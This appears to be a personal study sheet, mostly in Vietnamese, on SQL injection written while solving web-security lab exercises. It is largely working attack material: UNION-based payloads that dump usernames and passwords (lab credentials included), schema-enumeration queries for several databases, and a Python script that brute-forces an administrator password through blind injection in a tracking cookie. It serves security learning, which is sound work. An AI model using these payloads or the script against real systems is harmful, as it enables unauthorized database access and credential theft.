Test 1: https://shop.com/product.php?id=8'
→ Error: You have an error in your SQL syntax near ''' 

Test 2: https://shop.com/product.php?id=8' AND 1=1-- -
→ Hiển thị sản phẩm bình thường

Test 3: https://shop.com/product.php?id=8' AND 1=2-- -
→ Không hiển thị gì (blank page)
✅ Kết luận: Có SQL Injection

🧱 PHƯƠNG PHÁP 1: ORDER BY (Phương pháp đếm bằng sắp xếp)
Ý tưởng gốc
ORDER BY n = yêu cầu database sắp xếp theo cột thứ n
Nếu cột thứ n không tồn tại, database sẽ báo lỗi.

Bạn thử tăng dần:

ORDER BY 1   → OK
ORDER BY 2   → OK
ORDER BY 3   → lỗi
→ nghĩa là chỉ có 2 cột

🧱 PHƯƠNG PHÁP 2: UNION SELECT NULL,... (Phương pháp ghép dòng)
UNION = nối thêm hàng (row) từ một câu SELECT khác vào bên dưới kết quả.
Ví dụ:
SELECT id, name, score FROM Students
UNION
SELECT 999, 'Test', 0;
Kết quả sẽ là:
id	name	score
1	An	9.0
2	Bình	8.5
3	Chi	7.0
999	Test	0

Quan trọng: UNION chỉ hoạt động nếu hai SELECT có cùng số cột.
Giờ tưởng tượng: Bạn không biết câu SELECT gốc trả về bao nhiêu cột. Nhưng bạn muốn viết một câu UNION khớp số cột với nó.
Vì bạn chưa biết kiểu dữ liệu từng cột (số, chữ, ngày tháng,…), nên: dùng giá trị cụ thể (ví dụ 123, 'ABC') sẽ rất dễ sai kiểu.
Còn NULL thì: là “trống” → database thấy ổn trong hầu hết kiểu cột.
👉 Đó là lý do dùng:
UNION SELECT NULL
UNION SELECT NULL, NULL
UNION SELECT NULL, NULL, NULL
...
EXAMPLE
https://0a2c009903bfc9a780a31c86004b004e.web-security-academy.net/filter category=Accessories
Giả sử truy vấn gốc trong DB:
SELECT name, price FROM products WHERE category = 'Accessories' AND released = 1
ta chèn ' UNION SELECT NULL-- sau Accessories trong URL sẽ thành:
SELECT name, price FROM products WHERE category = 'Accessories' UNION SELECT NULL-- -' AND released = 1

sau khi xác định được số cột theo cách bên trên, ta cần xác định kiểu dữ liệu, vì khi dùng UNION SELECT thì theo sau phải là các
cột chứa kiểu dữ liệu khớp với truy vấn trước đó nên ta cũng thử các trường hợp dưới đây(giả sử đã tìm ra được rằng có 4 cột):
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
nếu báo lỗi thì thử tiếp khi không lỗi nữa thì oke.

sau khi thực hiện được các bước trên là biết số cột -> kiểu dữ liệu từng cột thì sau đó ta có thể truy vấn các thông tin thú vị 
mà ta cần ví dụ:
.../filter?category=Gifts' union select username, password from users-- -
ở đây ta đã biết trước được là The database contains a different table called users, with columns called username and password.

vấn đề tiếp theo, ví dụ truy vấn đầu tiên có hai cột với dữ liệu là số và string, mà dữ liệu ta cần lấy là username và passwd chỉ
có kiểu string thôi thì phải làm sao? đáp án là ta nên truy vấn với tham số đầu vẫn là kiểu số (để null cũng được) và username và 
passwd ta gộp lại thành một tham số với kiểu string bằng cách sau đây:
.../filter?category=Accessories' union select null, username || '~' || password FROM users-- -
kết quả là username và passwd được gộp thành một cột như sau đây:
wiener~sd3owh795lps65mpfso7
Giant Pillow Thing
administrator~2ptqk3jbmma3ogglyjp4
carlos~sagxavnidrd2oawyo7mz


Querying the database type and version
Database          | type	Query
                  | SELECT sqlite_version()
Microsoft, MySQL  | SELECT @@version
Oracle	          | SELECT * FROM v$version
PostgreSQL	      | SELECT version()
For example, use a UNION attack with the following input: ' UNION SELECT @@version--
!!!!!!!!!! đôi khi cần thêm khoảng trắng ở cuối (sau dấu --) có lẽ đối với csdl MySQL !!!!! 
để xác định được kiểu database type và version thì ta cũng cần phải làm các bước trước, xác định số cột của csdl, kiểu dl của từng
cột, sau đó truy vấn như bình thường, truy vấn cho csdl sẽ chiếm 1 cột:
.../filter?category=Pets' union select @@version, 'b'-- -
.../filter?category=Pets' union select @@version, @@version-- -


Listing the contents of the database
MySQL/PostgreSQL
to list the tables in the database: ' UNION SELECT * FROM information_schema.tables / ' UNION SELECT table_name, NULL FROM information_schema.tables--
to list the columns in individual tables: ' UNION SELECT * FROM information_schema.columns WHERE table_name = 'Users'
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_abcdef'--
to retrieve the usernames and passwords for all users:
' UNION SELECT username_abcdef, password_abcdef FROM users_abcdef--
graph TD
    A[Bắt đầu] --> B{Có biết tên bảng?};
    B -->|Không| C[Dùng information_schema.tables];
    B -->|Có| D{Có biết tên cột?};
    D -->|Không| E[Dùng information_schema.columns];
    D -->|Có| F[Truy vấn TRỰC TIẾP bảng đích];
    C --> G[Tìm được tên bảng];
    E --> H[Tìm được tên cột];
    G --> D;
    H --> F;
SQLite 
-- Liệt kê tables
SELECT name FROM sqlite_master WHERE type='table'
-- Liệt kê columns (cách 1)
SELECT sql FROM sqlite_master WHERE type='table' AND name='users'
for example: ' UNION SELECT 1, name, sql, 4 FROM sqlite_master WHERE type='table'--
Hoặc đơn giản hơn:
' UNION SELECT 1, name, type, 4 FROM sqlite_master--
sau đó: ' UNION SELECT 1, FLAG, 'Flag Found', 4 FROM S3CRET--

BLIND SQLi
SQLi mù, chỉ hiện những thứ như bt hoặc không, không hiện lỗi, cần đoán như kiểu có cái này hoặc không
khi đã biết được là "The database contains a different table called users, with columns called username and password"
B1: xác định có sql hay không 
…xyz' AND '1'='1 : hiển thị bt
…xyz' AND '1'='2 : không hiển thị một điều gì đó ví dụ dòng chữ "Welcome back"
B2: Xác định độ dài password: TrackingId=u5YD3PapBcR4lN3e7Tj4' AND 
(SELECT LENGTH(password) FROM users WHERE username='administrator') > 20--
B4: Xác định mk như kiểu bruteforce:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
CODE:
import requests
import string
import time

URL = "https://0af90056042ea25481793eea00c6002d.web-security-academy.net/"
TRACKING_ID = "uAiwO5Lqbnc6h7UB"
SESSION = "34NVyY78SB28EqaEt2DtyFwFW4Y2pHMb"

def check_response(payload):
    """Gửi request và kiểm tra response"""
    cookies = {'TrackingId': payload, 'session': SESSION}
    try:
        r = requests.get(URL, cookies=cookies, timeout=5)
        return "Welcome back" in r.text
    except:
        return False

def main():
    print("Đang tìm password...")
    
    # Tìm độ dài
    print("1. Tìm độ dài password...")
    for length in range(1, 51):
        payload = f"{TRACKING_ID}' AND (SELECT LENGTH(password) FROM users WHERE username='administrator')={length}--"
        if check_response(payload):
            print(f"   Độ dài: {length}")
            pw_length = length
            break
    
    # Tìm từng ký tự
    print("\n2. Tìm từng ký tự...")
    password = ""
    chars = string.ascii_lowercase + string.digits
    
    for pos in range(1, pw_length + 1):
        for char in chars:
            payload = f"{TRACKING_ID}' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), {pos}, 1)='{char}'--"
            
            if check_response(payload):
                password += char
                print(f"   Vị trí {pos:2d}: {char} → {password}")
                break
        
        time.sleep(0.2)
    
    print(f"\nPassword: {password}")

if __name__ == "__main__":
    main()





